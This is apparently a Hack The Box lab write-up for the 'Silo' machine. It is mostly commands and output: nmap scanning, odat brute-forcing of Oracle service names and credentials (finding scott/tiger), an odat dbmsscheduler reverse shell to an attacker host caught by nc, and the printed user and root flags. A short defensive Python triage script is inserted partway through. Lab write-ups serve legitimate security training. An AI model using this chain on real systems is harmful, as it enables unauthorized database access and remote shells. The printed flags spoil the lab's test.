Silo
Thu, 19 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.82 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.82
Host is up (0.036s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-18T23:13:59
|_ start_date: 2024-09-18T21:47:51
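As an added defensive example (not part of the original writeup), the following Python parses the nmap normal-format output above and flags the findings a blue team would triage on this host: the reachable Oracle TNS listener, HTTP TRACE, SMB signing not required, and exposed WinRM. The scan excerpt, regex, and function names are constructed for this example.

```python
import re

# Constructed excerpt of the nmap normal-format output shown above (10.10.10.82).
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
"""

# Matches a port line such as "1521/tcp open oracle-tns Oracle TNS listener ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return {port: (service, version)} for every open port in nmap normal output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(4), m.group(5).strip())
    return ports


def triage(text):
    """Return a list of findings worth escalating, derived from the scan text."""
    ports = parse_ports(text)
    findings = []
    # Oracle listener reachable from the scanning host: default accounts become a risk.
    if 1521 in ports or any(svc == "oracle-tns" for svc, _ in ports.values()):
        findings.append("oracle-tns listener reachable: restrict to app hosts, lock default accounts")
    # TRACE is reported by the http-methods script under the port it belongs to.
    if "Potentially risky methods: TRACE" in text:
        findings.append("HTTP TRACE enabled: disable via IIS request filtering")
    # smb2-security-mode host script: signing supported but not enforced.
    if "Message signing enabled but not required" in text:
        findings.append("SMB signing not required: enforce signing via group policy")
    if 5985 in ports:
        findings.append("WinRM (5985) exposed: limit to the management network")
    return findings
```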
sudo odat snguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid Service Names
[1.1] Searching valid Service Names thanks to a well known Service Name list on the 10.10.10.82:1521 server
[+] 'XE' is a valid Service Name. Continue...
[+] 'XEXDB' is a valid Service Name. Continue...
[1.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
[1.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid Service Name. Continue...
[+] Service Name(s) found on the 10.10.10.82:1521 server: XE,XEXDB
sudo odat passwordguesser -s 10.10.10.82 -n XEXDB
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password
[!] Notice: 'dip' account is locked, so skipping this username for password
[!] Notice: 'hr' account is locked, so skipping this username for password
[!] Notice: 'mdsys' account is locked, so skipping this username for password
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password
[!] Notice: 'outln' account is locked, so skipping this username for password
[+] Valid credentials found: scott/tiger. Continue...
[!] Notice: 'xdb' account is locked, so skipping this username for
[+] Accounts found on 10.10.10.82:1521/ServiceName:XEXDB:
scott/tiger
odat -h
dbmsscheduler to execute system commands without a standard output
odat dbmsscheduler -h
connection options:
-s SERVER server
-p PORT port (Default 1521)
-U USER Oracle username
-P PASSWORD Oracle password
-d SID Oracle System ID (SID)
-n SERVICENAME Oracle Service Name
--client-driver CLIENT-DRIVER Set client driver name (default: SQL*PLUS)
--sysdba connection as SYSDBA
--sysoper connection as SYSOPER
DBMSScheduler commands:
--exec EXEC execute a system command on the remote system
--reverse-shell ip port get a reverse shell. Use Python on Linux targets. On Windows, uses Powershell (download a script file and executes it remotely)
--cmd-exe execute command in a "cmd.exe /c" (for --exec with Windows target only)
--make-download urlToFile remotefilePath make the windows target download a local file with powershell over http
--test-module test the module before use it
sudo odat dbmsscheduler -s 10.10.10.82 -n XEXDB -U scott -P tiger --sysdba --reverse-shell 10.10.16.4 4435
rlwrap nc -lvnp 4435
10.10.16.4
Listening on 0.0.0.0 4435
Connection received on 10.10.10.82 49177
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>dir
Volume in drive C has no label.
Volume Serial Number is 69B2-6341
Directory of C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE
09/19/2024 02:35 AM <DIR> .
09/19/2024 02:35 AM <DIR> ..
01/01/2018 01:11 AM 2,048 hc_xe.dat
01/01/2018 01:12 AM 73 initXE.ora
05/29/2014 01:05 PM 31,744 oradba.exe
09/18/2024 10:48 PM 4,495 oradim.log
01/07/2018 02:25 PM 1,536 PWDXE.ora
5 File(s) 39,896 bytes
2 Dir(s) 7,398,612,992 bytes free
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 69B2-6341
Directory of C:\Users
01/04/2018 10:40 PM <DIR> .
01/04/2018 10:40 PM <DIR> ..
01/03/2018 02:03 AM <DIR> .NET v2.0
01/03/2018 02:03 AM <DIR> .NET v2.0 Classic
01/03/2018 10:23 PM <DIR> .NET v4.5
01/03/2018 10:23 PM <DIR> .NET v4.5 Classic
01/01/2018 01:49 AM <DIR> Administrator
01/03/2018 02:03 AM <DIR> Classic .NET AppPool
01/07/2018 03:04 PM <DIR> Phineas
08/22/2013 04:39 PM <DIR> Public
0 File(s) 0 bytes
10 Dir(s) 7,398,612,992 bytes free
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 69B2-6341
Directory of C:\Users\Administrator\Desktop
01/07/2018 02:34 PM <DIR> .
01/07/2018 02:34 PM <DIR> ..
09/18/2024 10:48 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,398,612,992 bytes free
C:\Users\Administrator\Desktop>type root.txt
0666bd9eb30e8f4fd1de4cbbefa027cc
C:\Users\Phineas\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 69B2-6341
Directory of C:\Users\Phineas\Desktop
01/07/2018 03:03 PM <DIR> .
01/07/2018 03:03 PM <DIR> ..
01/05/2018 11:56 PM 300 Oracle issue.txt
09/18/2024 10:48 PM 34 user.txt
2 File(s) 334 bytes
2 Dir(s) 7,398,612,992 bytes free
C:\Users\Phineas\Desktop>type user.txt
69472884b75beedfb12216d48516cc8b